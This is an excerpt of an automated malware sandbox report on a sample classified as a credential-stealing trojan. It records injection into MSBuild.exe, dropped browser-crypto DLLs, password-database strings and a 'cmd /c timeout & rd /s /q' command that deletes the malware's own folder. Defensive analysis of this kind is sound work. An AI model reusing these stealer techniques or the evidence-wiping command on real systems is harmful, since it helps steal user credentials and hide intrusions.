Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 5_2_6D367F20	5_2_6D367F20
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 5_2_6D231F90	5_2_6D231F90
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 5_2_6D2BBFF0	5_2_6D2BBFF0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 5_2_6D32DFC0	5_2_6D32DFC0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 5_2_6D393FC0	5_2_6D393FC0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 5_2_6D31DE10	5_2_6D31DE10
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 5_2_6D36BE70	5_2_6D36BE70
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 5_2_6D395E60	5_2_6D395E60
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 5_2_6D233EC0	5_2_6D233EC0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 5_2_6D2C5920	5_2_6D2C5920
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 5_2_6D35F900	5_2_6D35F900
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 5_2_6D28F960	5_2_6D28F960
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 5_2_6D2CD960	5_2_6D2CD960
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 5_2_6D221980	5_2_6D221980
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 5_2_6D2E1990	5_2_6D2E1990
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 5_2_6D2759F0	5_2_6D2759F0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 5_2_6D2A79F0	5_2_6D2A79F0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 5_2_6D2A99C0	5_2_6D2A99C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 5_2_6D2499D0	5_2_6D2499D0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 5_2_6D26D810	5_2_6D26D810
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 5_2_6D21D8E0	5_2_6D21D8E0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 5_2_6D2438E0	5_2_6D2438E0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 5_2_6D36B8F0	5_2_6D36B8F0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 5_2_6D2EF8F0	5_2_6D2EF8F0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 5_2_6D2AF8C0	5_2_6D2AF8C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 5_2_6D25BB20	5_2_6D25BB20
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 5_2_6D2EFB60	5_2_6D2EFB60
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 5_2_6D269BA0	5_2_6D269BA0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 5_2_6D2D9BB0	5_2_6D2D9BB0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 5_2_6D201B80	5_2_6D201B80
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 5_2_6D2F5B90	5_2_6D2F5B90
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 5_2_6D257BF0	5_2_6D257BF0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 5_2_6D30DA30	5_2_6D30DA30
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 5_2_6D24FA10	5_2_6D24FA10
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 5_2_6D2B1A10	5_2_6D2B1A10
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 5_2_6D399A50	5_2_6D399A50
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 5_2_6D2EDAB0	5_2_6D2EDAB0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 5_2_6D211AE0	5_2_6D211AE0
Source: C:\ProgramData\HCFIIIJJKJ.exe	Code function: 15_2_002D2021	15_2_002D2021
Source: C:\ProgramData\HCFIIIJJKJ.exe	Code function: 15_2_00302088	15_2_00302088
Source: C:\ProgramData\HCFIIIJJKJ.exe	Code function: 15_2_003040C8	15_2_003040C8
Source: C:\ProgramData\HCFIIIJJKJ.exe	Code function: 15_2_0032E132	15_2_0032E132
Source: C:\ProgramData\HCFIIIJJKJ.exe	Code function: 15_2_00302123	15_2_00302123
Source: C:\ProgramData\HCFIIIJJKJ.exe	Code function: 15_2_0032E1A8	15_2_0032E1A8
Source: C:\ProgramData\HCFIIIJJKJ.exe	Code function: 15_2_002FE1CF	15_2_002FE1CF
Source: C:\ProgramData\HCFIIIJJKJ.exe	Code function: 15_2_00308278	15_2_00308278
Source: C:\ProgramData\HCFIIIJJKJ.exe	Code function: 15_2_002FE27B	15_2_002FE27B
Source: C:\ProgramData\HCFIIIJJKJ.exe	Code function: 15_2_002FE272	15_2_002FE272
Source: C:\ProgramData\HCFIIIJJKJ.exe	Code function: 15_2_002FE455	15_2_002FE455
Source: C:\ProgramData\HCFIIIJJKJ.exe	Code function: 15_2_00300488	15_2_00300488
Source: C:\ProgramData\HCFIIIJJKJ.exe	Code function: 15_2_002FE527	15_2_002FE527
Source: C:\ProgramData\HCFIIIJJKJ.exe	Code function: 15_2_0032E738	15_2_0032E738
Source: C:\ProgramData\HCFIIIJJKJ.exe	Code function: 15_2_00338798	15_2_00338798
Source: C:\ProgramData\HCFIIIJJKJ.exe	Code function: 15_2_00344988	15_2_00344988
Source: C:\ProgramData\HCFIIIJJKJ.exe	Code function: 15_2_0031AA47	15_2_0031AA47
Source: C:\ProgramData\HCFIIIJJKJ.exe	Code function: 15_2_002DCAF2	15_2_002DCAF2
Source: C:\ProgramData\HCFIIIJJKJ.exe	Code function: 15_2_00304AC8	15_2_00304AC8
Source: C:\ProgramData\HCFIIIJJKJ.exe	Code function: 15_2_00306D40	15_2_00306D40
Source: C:\ProgramData\HCFIIIJJKJ.exe	Code function: 15_2_0032AD84	15_2_0032AD84
Source: C:\ProgramData\HCFIIIJJKJ.exe	Code function: 15_2_00308D88	15_2_00308D88
Source: C:\ProgramData\HCFIIIJJKJ.exe	Code function: 15_2_00344E98	15_2_00344E98
Source: C:\ProgramData\HCFIIIJJKJ.exe	Code function: 15_2_00340F18	15_2_00340F18
Source: C:\ProgramData\HCFIIIJJKJ.exe	Code function: 15_2_0030EF08	15_2_0030EF08
Source: C:\ProgramData\HCFIIIJJKJ.exe	Code function: 15_2_00346FA8	15_2_00346FA8
Source: C:\ProgramData\HCFIIIJJKJ.exe	Code function: 15_2_0030B078	15_2_0030B078
Source: C:\ProgramData\HCFIIIJJKJ.exe	Code function: 15_2_003351A8	15_2_003351A8
Source: C:\ProgramData\HCFIIIJJKJ.exe	Code function: 15_2_003071D8	15_2_003071D8
Source: C:\ProgramData\HCFIIIJJKJ.exe	Code function: 15_2_002D729C	15_2_002D729C
Source: C:\ProgramData\HCFIIIJJKJ.exe	Code function: 15_2_002ED39B	15_2_002ED39B
Source: C:\ProgramData\HCFIIIJJKJ.exe	Code function: 15_2_003333C8	15_2_003333C8
Source: C:\ProgramData\HCFIIIJJKJ.exe	Code function: 15_2_00305468	15_2_00305468
Source: C:\ProgramData\HCFIIIJJKJ.exe	Code function: 15_2_003194C8	15_2_003194C8
Source: C:\ProgramData\HCFIIIJJKJ.exe	Code function: 15_2_002E572C	15_2_002E572C
Source: C:\ProgramData\HCFIIIJJKJ.exe	Code function: 15_2_00307728	15_2_00307728
Source: C:\ProgramData\HCFIIIJJKJ.exe	Code function: 15_2_0033B778	15_2_0033B778
Source: C:\ProgramData\HCFIIIJJKJ.exe	Code function: 15_2_00341918	15_2_00341918
Source: C:\ProgramData\HCFIIIJJKJ.exe	Code function: 15_2_002EBB36	15_2_002EBB36
Source: C:\ProgramData\HCFIIIJJKJ.exe	Code function: 15_2_00329BA8	15_2_00329BA8
Source: C:\ProgramData\HCFIIIJJKJ.exe	Code function: 15_2_002E3C92	15_2_002E3C92
Source: C:\ProgramData\HCFIIIJJKJ.exe	Code function: 15_2_002D1D79	15_2_002D1D79
Source: C:\ProgramData\HCFIIIJJKJ.exe	Code function: 15_2_00307DE8	15_2_00307DE8
Source: C:\ProgramData\HCFIIIJJKJ.exe	Code function: 15_2_002DFEF0	15_2_002DFEF0
Source: C:\ProgramData\HCFIIIJJKJ.exe	Code function: 15_2_002FDED8	15_2_002FDED8

Dropped file seen in connection with other malware

Source: Joe Sandbox View	Dropped File: C:\ProgramData\freebl3.dll EDD043F2005DBD5902FC421EABB9472A7266950C5CBACA34E2D590B17D12F5FA
Source: Joe Sandbox View	Dropped File: C:\ProgramData\mozglue.dll BA06A6EE0B15F5BE5C4E67782EEC8B521E36C107A329093EC400FE0404EB196A

Found potential string decryption / allocating functions

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: String function: 6D3909D0 appears 299 times
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: String function: 004047E8 appears 38 times
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: String function: 6D233620 appears 93 times
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: String function: 6D39DAE0 appears 69 times
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: String function: 004104BC appears 37 times
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: String function: 004105DE appears 71 times
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: String function: 6D39D930 appears 56 times
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: String function: 6D349F30 appears 50 times
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: String function: 6D239B10 appears 93 times
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: String function: 6D26C5E0 appears 35 times
Source: C:\ProgramData\HCFIIIJJKJ.exe	Code function: String function: 0031A1D8 appears 152 times
Source: C:\ProgramData\HCFIIIJJKJ.exe	Code function: String function: 00309978 appears 93 times
Source: C:\ProgramData\HCFIIIJJKJ.exe	Code function: String function: 002D7B80 appears 49 times
Source: C:\Users\user\Desktop\VmRHSCaiyc.exe	Code function: String function: 00357B80 appears 49 times

One or more processes crash

Source: C:\Users\user\Desktop\VmRHSCaiyc.exe

Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 2024 -s 260

Sample file is different than original file name gathered from version info

Source: VmRHSCaiyc.exe, 00000004.00000000.1278493114.00000000003E0000.00000002.00000001.01000000.00000004.sdmp	Binary or memory string: OriginalFilenameproquota.exej% vs VmRHSCaiyc.exe
Source: VmRHSCaiyc.exe	Binary or memory string: OriginalFilenameproquota.exej% vs VmRHSCaiyc.exe

Uses 32bit PE files

Source: VmRHSCaiyc.exe

Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: VmRHSCaiyc.exe	Static PE information: Section: .data ZLIB complexity 0.9919846754807692
Source: HCFIIIJJKJ.exe.5.dr	Static PE information: Section: .data ZLIB complexity 0.9912150349650349
Source: a43486128347[1].exe.5.dr	Static PE information: Section: .data ZLIB complexity 0.9912150349650349

Source: classification engine

Classification label: mal100.troj.spyw.evad.winEXE@14/36@15/6

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe

Code function: 5_2_6D270300 MapViewOfFile,GetLastError,FormatMessageA,PR_LogPrint,GetLastError,PR_SetError,

5_2_6D270300

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe

Code function: 5_2_0041147A CreateToolhelp32Snapshot,Process32First,Process32Next,CloseHandle,

5_2_0041147A

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe

5_2_0041196C

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe

File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\BEDT2L3A\19VBZ7FS.htm

Jump to behavior

Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7868:120:WilError_03
Source: C:\Windows\SysWOW64\WerFault.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess7732
Source: C:\Windows\SysWOW64\WerFault.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess2024

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe

File created: C:\Users\user~1\AppData\Local\Temp\delays.tmp

Jump to behavior

Source: C:\ProgramData\HCFIIIJJKJ.exe	Command line argument: MZx	15_2_002D2021
Source: C:\ProgramData\HCFIIIJJKJ.exe	Command line argument: MZx	15_2_002D2021
Source: C:\ProgramData\HCFIIIJJKJ.exe	Command line argument: MZx	15_2_002D2021

Source: VmRHSCaiyc.exe

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe

File read: C:\Users\user\Desktop\desktop.ini

Jump to behavior

Source: C:\Users\user\Desktop\VmRHSCaiyc.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: MSBuild.exe, 00000005.00000002.1797401893.0000000032271000.00000004.00000020.00020000.00000000.sdmp, softokn3.dll.5.dr, softokn3[1].dll.5.dr	Binary or memory string: CREATE TABLE metaData (id PRIMARY KEY UNIQUE ON CONFLICT REPLACE, item1, item2);
Source: MSBuild.exe, 00000005.00000002.1817017421.000000006D39F000.00000002.00000001.01000000.00000008.sdmp, MSBuild.exe, 00000005.00000002.1802800143.000000003E153000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000005.00000002.1778653897.000000001A032000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000005.00000002.1788346120.000000001FFA8000.00000002.00001000.00020000.00000000.sdmp, nss3.dll.5.dr, nss3[1].dll.5.dr, sql[1].dll.5.dr	Binary or memory string: UPDATE %Q.sqlite_master SET tbl_name = %Q, name = CASE WHEN type='table' THEN %Q WHEN name LIKE 'sqliteX_autoindex%%' ESCAPE 'X' AND type='index' THEN 'sqlite_autoindex_' \|\| %Q \|\| substr(name,%d+18) ELSE name END WHERE tbl_name=%Q COLLATE nocase AND (type='table' OR type='index' OR type='trigger');
Source: MSBuild.exe, 00000005.00000002.1797401893.0000000032271000.00000004.00000020.00020000.00000000.sdmp, softokn3.dll.5.dr, softokn3[1].dll.5.dr	Binary or memory string: SELECT ALL * FROM %s LIMIT 0;
Source: MSBuild.exe, 00000005.00000002.1817017421.000000006D39F000.00000002.00000001.01000000.00000008.sdmp, MSBuild.exe, 00000005.00000002.1802800143.000000003E153000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000005.00000002.1778653897.000000001A032000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000005.00000002.1788346120.000000001FFA8000.00000002.00001000.00020000.00000000.sdmp, nss3.dll.5.dr, nss3[1].dll.5.dr, sql[1].dll.5.dr	Binary or memory string: CREATE TABLE %Q.'%q_docsize'(docid INTEGER PRIMARY KEY, size BLOB);
Source: MSBuild.exe, 00000005.00000002.1817017421.000000006D39F000.00000002.00000001.01000000.00000008.sdmp, MSBuild.exe, 00000005.00000002.1802800143.000000003E153000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000005.00000002.1778653897.000000001A032000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000005.00000002.1788346120.000000001FFA8000.00000002.00001000.00020000.00000000.sdmp, nss3.dll.5.dr, nss3[1].dll.5.dr, sql[1].dll.5.dr	Binary or memory string: CREATE TABLE IF NOT EXISTS %Q.'%q_stat'(id INTEGER PRIMARY KEY, value BLOB);
Source: MSBuild.exe, 00000005.00000002.1817017421.000000006D39F000.00000002.00000001.01000000.00000008.sdmp, MSBuild.exe, 00000005.00000002.1802800143.000000003E153000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000005.00000002.1778653897.000000001A032000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000005.00000002.1788346120.000000001FFA8000.00000002.00001000.00020000.00000000.sdmp, nss3.dll.5.dr, nss3[1].dll.5.dr, sql[1].dll.5.dr	Binary or memory string: CREATE TABLE %Q.'%q_segdir'(level INTEGER,idx INTEGER,start_block INTEGER,leaves_end_block INTEGER,end_block INTEGER,root BLOB,PRIMARY KEY(level, idx));
Source: MSBuild.exe, 00000005.00000002.1797401893.0000000032271000.00000004.00000020.00020000.00000000.sdmp, softokn3.dll.5.dr, softokn3[1].dll.5.dr	Binary or memory string: UPDATE %s SET %s WHERE id=$ID;
Source: MSBuild.exe, 00000005.00000002.1797401893.0000000032271000.00000004.00000020.00020000.00000000.sdmp, softokn3.dll.5.dr, softokn3[1].dll.5.dr	Binary or memory string: SELECT ALL * FROM metaData WHERE id=$ID;
Source: MSBuild.exe, 00000005.00000002.1778653897.000000001A032000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000005.00000002.1788346120.000000001FFA8000.00000002.00001000.00020000.00000000.sdmp, sql[1].dll.5.dr	Binary or memory string: INSERT INTO "%w"."%w"("%w") VALUES('integrity-check');
Source: MSBuild.exe, 00000005.00000002.1797401893.0000000032271000.00000004.00000020.00020000.00000000.sdmp, softokn3.dll.5.dr, softokn3[1].dll.5.dr	Binary or memory string: SELECT ALL id FROM %s WHERE %s;
Source: MSBuild.exe, 00000005.00000002.1797401893.0000000032271000.00000004.00000020.00020000.00000000.sdmp, softokn3.dll.5.dr, softokn3[1].dll.5.dr	Binary or memory string: INSERT INTO metaData (id,item1) VALUES($ID,$ITEM1);
Source: MSBuild.exe, 00000005.00000002.1778653897.000000001A032000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000005.00000002.1788346120.000000001FFA8000.00000002.00001000.00020000.00000000.sdmp, sql[1].dll.5.dr	Binary or memory string: CREATE TABLE IF NOT EXISTS %s.'rbu_tmp_%q' AS SELECT *%s FROM '%q' WHERE 0;
Source: MSBuild.exe, 00000005.00000002.1797401893.0000000032271000.00000004.00000020.00020000.00000000.sdmp, softokn3.dll.5.dr, softokn3[1].dll.5.dr	Binary or memory string: INSERT INTO %s (id%s) VALUES($ID%s);
Source: MSBuild.exe, MSBuild.exe, 00000005.00000002.1817017421.000000006D39F000.00000002.00000001.01000000.00000008.sdmp, MSBuild.exe, 00000005.00000002.1802800143.000000003E153000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000005.00000002.1778653897.000000001A032000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000005.00000002.1788346120.000000001FFA8000.00000002.00001000.00020000.00000000.sdmp, nss3.dll.5.dr, nss3[1].dll.5.dr, sql[1].dll.5.dr	Binary or memory string: INSERT INTO %Q.sqlite_master VALUES('index',%Q,%Q,#%d,%Q);
Source: MSBuild.exe, 00000005.00000002.1817017421.000000006D39F000.00000002.00000001.01000000.00000008.sdmp, MSBuild.exe, 00000005.00000002.1802800143.000000003E153000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000005.00000002.1778653897.000000001A032000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000005.00000002.1788346120.000000001FFA8000.00000002.00001000.00020000.00000000.sdmp, nss3.dll.5.dr, nss3[1].dll.5.dr, sql[1].dll.5.dr	Binary or memory string: CREATE TABLE %Q.'%q_segments'(blockid INTEGER PRIMARY KEY, block BLOB);
Source: MSBuild.exe, 00000005.00000002.1797401893.0000000032271000.00000004.00000020.00020000.00000000.sdmp, softokn3.dll.5.dr, softokn3[1].dll.5.dr	Binary or memory string: INSERT INTO metaData (id,item1,item2) VALUES($ID,$ITEM1,$ITEM2);
Source: MSBuild.exe, 00000005.00000002.1778653897.000000001A032000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000005.00000002.1788346120.000000001FFA8000.00000002.00001000.00020000.00000000.sdmp, sql[1].dll.5.dr	Binary or memory string: CREATE TABLE x(addr INT,opcode TEXT,p1 INT,p2 INT,p3 INT,p4 TEXT,p5 INT,comment TEXT,subprog TEXT,nexec INT,ncycle INT,stmt HIDDEN);
Source: ECGIII.5.dr	Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
Source: MSBuild.exe, 00000005.00000002.1797401893.0000000032271000.00000004.00000020.00020000.00000000.sdmp, softokn3.dll.5.dr, softokn3[1].dll.5.dr	Binary or memory string: SELECT ALL * FROM %s LIMIT 0;CREATE TEMPORARY TABLE %s AS SELECT * FROM %sD
Source: MSBuild.exe, 00000005.00000002.1778653897.000000001A032000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000005.00000002.1788346120.000000001FFA8000.00000002.00001000.00020000.00000000.sdmp, sql[1].dll.5.dr	Binary or memory string: CREATE TABLE "%w"."%w_parent"(nodeno INTEGER PRIMARY KEY,parentnode);
Source: MSBuild.exe, 00000005.00000002.1778653897.000000001A032000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000005.00000002.1788346120.000000001FFA8000.00000002.00001000.00020000.00000000.sdmp, sql[1].dll.5.dr	Binary or memory string: CREATE TABLE x(type TEXT,schema TEXT,name TEXT,wr INT,subprog TEXT,stmt HIDDEN);
Source: MSBuild.exe, 00000005.00000002.1797401893.0000000032271000.00000004.00000020.00020000.00000000.sdmp, softokn3.dll.5.dr, softokn3[1].dll.5.dr	Binary or memory string: SELECT DISTINCT %s FROM %s where id=$ID LIMIT 1;

Source: VmRHSCaiyc.exe	ReversingLabs: Detection: 50%
Source: VmRHSCaiyc.exe	Virustotal: Detection: 47%

Source: unknown	Process created: C:\Users\user\Desktop\VmRHSCaiyc.exe "C:\Users\user\Desktop\VmRHSCaiyc.exe"
Source: C:\Users\user\Desktop\VmRHSCaiyc.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
Source: C:\Users\user\Desktop\VmRHSCaiyc.exe	Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 2024 -s 260
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process created: C:\ProgramData\HCFIIIJJKJ.exe "C:\ProgramData\HCFIIIJJKJ.exe"
Source: C:\ProgramData\HCFIIIJJKJ.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
Source: C:\ProgramData\HCFIIIJJKJ.exe	Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 7732 -s 272
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c timeout /t 10 & rd /s /q "C:\ProgramData\KKEHIEBKJKFI" & exit
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\timeout.exe timeout /t 10
Source: C:\Users\user\Desktop\VmRHSCaiyc.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process created: C:\ProgramData\HCFIIIJJKJ.exe "C:\ProgramData\HCFIIIJJKJ.exe"	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c timeout /t 10 & rd /s /q "C:\ProgramData\KKEHIEBKJKFI" & exit	Jump to behavior
Source: C:\ProgramData\HCFIIIJJKJ.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\timeout.exe timeout /t 10	Jump to behavior

Source: C:\Users\user\Desktop\VmRHSCaiyc.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: rstrtmgr.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: dbghelp.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: schannel.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: mskeyprotect.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: cryptbase.dll	Jump to behavior
